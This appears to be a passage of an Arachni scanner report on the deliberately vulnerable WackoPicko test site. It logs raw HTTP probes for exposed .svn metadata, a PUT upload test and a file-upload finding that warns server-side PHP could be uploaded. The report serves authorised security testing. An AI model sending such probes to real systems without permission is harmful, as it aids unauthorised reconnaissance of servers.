document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
GET
at
http://192.168.0.26/WackoPicko/.svn/wc.db
pointing to
http://192.168.0.26/WackoPicko/.svn/wc.db
.
| Type | In | Action |
|---|---|---|
server |
http://192.168.0.26/WackoPicko/.svn/wc.db | http://192.168.0.26/WackoPicko/.svn/wc.db |
Raw HTTP request used to retrieve the page.
GET /WackoPicko/.svn/wc.db HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:49:51 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 196
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/.svn/wc.db
on this server.</p>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
GET
at
http://192.168.0.26/WackoPicko/css/.svn/all-wcprops
pointing to
http://192.168.0.26/WackoPicko/css/.svn/all-wcprops
.
Raw HTTP request used to retrieve the page.
GET /WackoPicko/css/.svn/all-wcprops HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:51:35 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 201
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/css/.svn/all-wcprops
on this server.</p>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
PUT
at
http://192.168.0.26/WackoPicko/admin/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
pointing to
http://192.168.0.26/WackoPicko/admin/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
.
Raw HTTP request used to retrieve the page.
PUT /WackoPicko/admin/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64 Content-Length: 55 Expect: 100-continue Created by Arachni. PUTca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 100 Continue
HTTP/1.1 405 Method Not Allowed
Date: Mon, 06 Aug 2018 22:52:08 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Allow: GET,HEAD,POST,OPTIONS,TRACE
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 228
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PUT is not allowed for the URL /WackoPicko/admin/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec.</p>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
The design of many web applications require that users be able to upload files that will either be stored or processed by the receiving web server.
Arachni has flagged this not as a vulnerability, but as a prompt for the penetration tester to conduct further manual testing on the file upload function.
An insecure form-based file upload could allow a cyber-criminal a means to abuse and successfully exploit the server directly, and/or any third party that may later access the file. This can occur through uploading a file containing server side-code (such as PHP) that is then executed when requested by the client.
The identified page should at a minimum:
POST method rather than
GET or PUT.form
with inputs
MAX_FILE_SIZE
userfile
name
using
GET
at
http://192.168.0.26/WackoPicko/
pointing to
http://192.168.0.26/WackoPicko/piccheck.php
.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | <form enctype="multipart/form-data" action="/WackoPicko/piccheck.php" method="POST"> <input type="hidden" name="MAX_FILE_SIZE" value="30000"> </input> Check this file: <input name="userfile" type="file"> </input> <br> </br> With this name: <input name="name" type="text"> </input> <br> </br> <br> </br> <input type="submit" value="Send File"> </input> <br> </br> </form> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
form |
http://192.168.0.26/WackoPicko/ | http://192.168.0.26/WackoPicko/piccheck.php |
|
|
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options | ||
|---|---|---|---|---|---|---|
| 0 | 3.950414 | load |
page
|
|
||
| 1 | 2.996451 | request |
http://192.168.0.26/WackoPicko/ |
|
||
| 2 | 0.337047 | request |
http://192.168.0.26/WackoPicko/css/stylings.php |
|
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5 Accept-Language: en-CA,*
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:48 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 | <html><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen"> <title>WackoPicko.com</title> </head> <body> <div class="container " style="border: 2px solid #5c95cf;"> <div class="column span-24 first last"> <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1> </div> <div id="menu"> <div class="column prepend-1 span-14 first"> <ul class="menu"> <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li> <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li> <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li> <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li> </ul> </div> <div class="column prepend-1 span-7 first last"> <ul class="menu top_login"> <li><a href="/WackoPicko/users/login.php"><span>Login</span></a></li> </ul> </div> </div> <div class="column span-24 first last" id="search_bar_blue"> <div class="column prepend-17 span-7 first last" id="search_box"> <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;"> </form> </div> </div> <div class="column prepend-1 span-24 first last"> <h2>Welcome to WackoPicko</h2> <p> On WackoPicko, you can share all your crazy pics with your friends. <br> But that's not all, you can also buy the rights to the high quality <br> version of someone's pictures. WackoPicko is fun for the whole family. </p> <h3>New Here?</h3> <p> </p><h4><a href="/WackoPicko/users/register.php">Create an account</a></h4> <p></p> <p> </p><h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4> <p></p> <p> </p><h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4> <p></p> <p> </p><h4>Or you can test to see if WackoPicko can handle a file:</h4> <br> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>'); </script><form enctype="multipart/form-data" action="/WackoPicko/piccheck.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000">Check this file: <input name="userfile" type="file"> <br>With this name: <input name="name" type="text"> <br> <br><input type="submit" value="Send File"><br> </form> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <p></p> </div> <div class="column span-24 first last" id="footer"> <ul> <li><a href="/WackoPicko/">Home</a> |</li> <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li> <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li> <li><a href="/WackoPicko/tos.php">Terms of Service</a></li> </ul> </div> </div> </body></html> |
This is the original HTTP response body.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 | <script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* 